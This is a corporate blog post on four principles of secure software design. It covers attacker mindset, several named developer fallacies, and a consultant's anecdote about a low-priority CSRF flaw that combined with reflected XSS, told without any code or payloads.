close search bar

Sorry, not available in this language yet

close language selection

4 principles of secure software design

Synopsys Editorial Team

Aug 17, 2016 / 6 min read

Secure software design sounds like a pretty concrete concept, right? The software is either secure or it’s not. If only it were that simple. Software design and development is evolving at an amazing rate. That’s why it’s critically important to stay on top of the security measures protecting each piece of software. Here are four ways to remain sharp, staying ahead of the bad people.

1. Know that somebody is out to get you.

Maybe they already have and you don’t even know it. Nope, this isn’t the tagline for Hollywood’s next psychological thriller. It’s the day-to-day world of corporate computing, a global economy and infrastructure built on silicon. I’m talking about the 'digital you,' here. You know, the collection of ones and zeroes stored across databases, the ubiquitous cloud, and every square inch of virtual real estate. In the physical world, or ‘meat space’ as I affectionately like to think of it, the digital you takes the form of credit cards, social security numbers, medical records, and countless other embodiments.

A single individual accumulates a huge cyber target over the course of their lifetime. However, the average Joe is rarely singled out as a direct target. Rather, the bad people are going after the corporations that hold the digital you.

They’re not just after you. Or me. They’re after all of us…

Reading this back to myself, I don’t hear it in my own voice. Instead, I hear that of Elliot Alderson, the protagonist of television’s Mr. Robot. Hollywood isn’t far from the truth sometimes.

Although digital crime isn’t as dramatic or sexy as Hollywood makes it out to be, it’s something worth being paranoid about. Somebody, no—somebodies—are out to get you. And they won’t be easily deterred. As a software security consultant, this is a paranoia I wish every software developer, project manager, and CEO comes to understand sooner rather than later. It’s unfortunate that my great aunt can’t write software. I mean, she won’t even get an email address because she’s afraid that that’s how hackers will invade her brain.

In contrast to the conventional wisdom of ‘fearing what we don’t understand,’ perhaps we tend not to fear what we don’t understand in the cyber world. Maybe we should.

2. Be mindful of abuse cases.

Even skilled and experienced developers often don’t understand the mentality of an attacker. They understand the technical details of how someone could abuse a system to perform some unintended actions, sure. It’s the psychology of the attackers that they fail to understand. It’s a slippery slope to what I’m going to dub the Happy Path Security Fallacy, the Target Fallacy, and the Everest Fallacy.

The Happy Path Security Fallacy

The Happy Path Security Fallacy is the false sense of security created by one’s own ignorance. Developers tend to judge the security posture of their creations with their own yardstick. Something along the lines of: “This is certainly secure because I built it and even I could not hack it.”  What’s my point? Developers focus on the use cases.

The implications of the abuse cases may be disregarded by this Happy Path Security thought process. This is demonstrated by a misconception regarding POST parameters that I commonly see. Something like: “We don’t need to worry about x, y, or z because the input is from POST parameters over HTTPS, so the input can’t be tampered with.” It is true that an attacker may not easily be able to manipulate the input of a third-party in this scenario. But, they fail to realize how easy it is for an attacker to modify their own input. In fact, it is trivial with the use of an intercepting proxy.

The best way to avoid being a victim of this fallacy is to learn to think like an attacker. Many security training programs may only reinforce the fallacy if it solely concentrates on defense. It is important that security training have a strong concentration on attacking.

The Target Fallacy

The Target Fallacy is the belief that attackers don't target a business. The basis for this belief often comes from a false sense of security created by patching the obvious and easy vulnerabilities to exploit—the ‘low hanging fruit’ as it’s often called.

When presented with vulnerabilities that are more subtle, the business confidently responds that such vulnerabilities are too obscure. “Sure,” they tell me, “you found this but you had a whitelisted IP, our source code, and access to our development team. I don’t think it’s very likely anybody else will find this without those accommodations.” If you’re thinking that this sounds like ‘security through obscurity,’ you’re right. And you’re also right that it’s hardly security at all.

Hackers like challenges. The greater the challenge, the greater the reward.

The Everest Fallacy

The Everest Fallacy closely relates to the Target Fallacy. This is the belief that a vulnerability is too involved, too time consuming, or simply just too difficult for an attacker to bother with, much less successfully exploit.

Why have I dubbed it the Everest Fallacy, you ask? To give you a relevant example, consider your passion. For the sake of argument let’s say you’re an avid mountain climber. As such, once you’ve summited a mountain do you decide not to climb a taller one because it will be too difficult? No way! You climb it because it’s there, because you can. You love that kind of challenge. Well, hacking is the same way. Hackers will abuse your software because they can.

3. Understand that small vulnerabilities build upon each other.

It’s also important to consider the small things. In particular, the small vulnerabilities. Small vulnerabilities are just that, bugs or flaws that have relatively small security implications. But there is power insecurity in numbers. Clever attackers seem to have a knack for getting the most out of every small vulnerability. They often find ways to chain them together to transform three or four small vulnerabilities into an impressive synergy of destruction.

The worst thing about small vulnerabilities (or best, depending on your agenda) is the fact that mitigation is often ignored for the sake of concentrating on fixing the big ones. Even small vulnerabilities that are relatively quick and easy to fix fall by the wayside and are either forgotten about completely or classified as “known vulnerabilities.” I suppose that has a better ring to it than “vulnerabilities we don’t take seriously.”

The No Biggie Fallacy

I’ve witnessed the fallacy that I’m dubbing the No Biggie first hand, with a second round application test for a long-term client. One of the lower priority findings on the first test was a cross-site request forgery (CSRF) issue that I discovered. Over a year later it still hadn’t been remediated when I began the next annual assessment. All but one rather obscure page was protected by CSRF tokens. Although it would have been very easy to do the same for that page, it went unpatched due to being deemed unimportant.

It turns out that a recent release introduced a reflected cross-site scripting (XSS) vulnerability into that page and a few others. Reflected XSS is also typically recognized as lower importance (especially when it requires authentication and must be sent via POST). However, it just so happened that the vulnerable parameter could be passed in the CSRF request. This creates an elegant attack vector. I doubt either would have ever been mitigated if one hadn’t worsened the impact of the other.

4. Build things securely for the sake of posterity.

That brings me to my final point of interest. Building security in is largely about building things securely for the sake of posterity. In the previous example, the two parts of the reflected XSS via a CSRF attack didn’t come into existence at the same time. The moral here is that just because something isn’t exploitable today doesn’t guarantee that it won’t be exploitable tomorrow.

Just because something isn’t exploitable today doesn’t guarantee it won’t be exploitable tomorrow.

Future code changes may escalate previously small issues into much bigger ones. Moreover, there’s never any guarantee that all of the vulnerabilities in a system are known. Even without code changes, a new vulnerability may be discovered that benefits from the poor security practices of the past. Maybe it’s a common vulnerability that went unnoticed, a vulnerability that is subtle and unique to the particular system, or a zero-day exploit that makes its way to the public domain.

Big things and small things alike, your best bet to minimize the impact of any threat is to build security into every tier and every stage of development.

Summing it up.

Regardless of how many precautions you take, at the end of the day, somebodies are still out to get you. Software security is a cat and mouse game. Don’t fall victim to the fallacies above and you’ll help yourself stay out in front. In short, stay paranoid.

Continue Reading

Explore Topics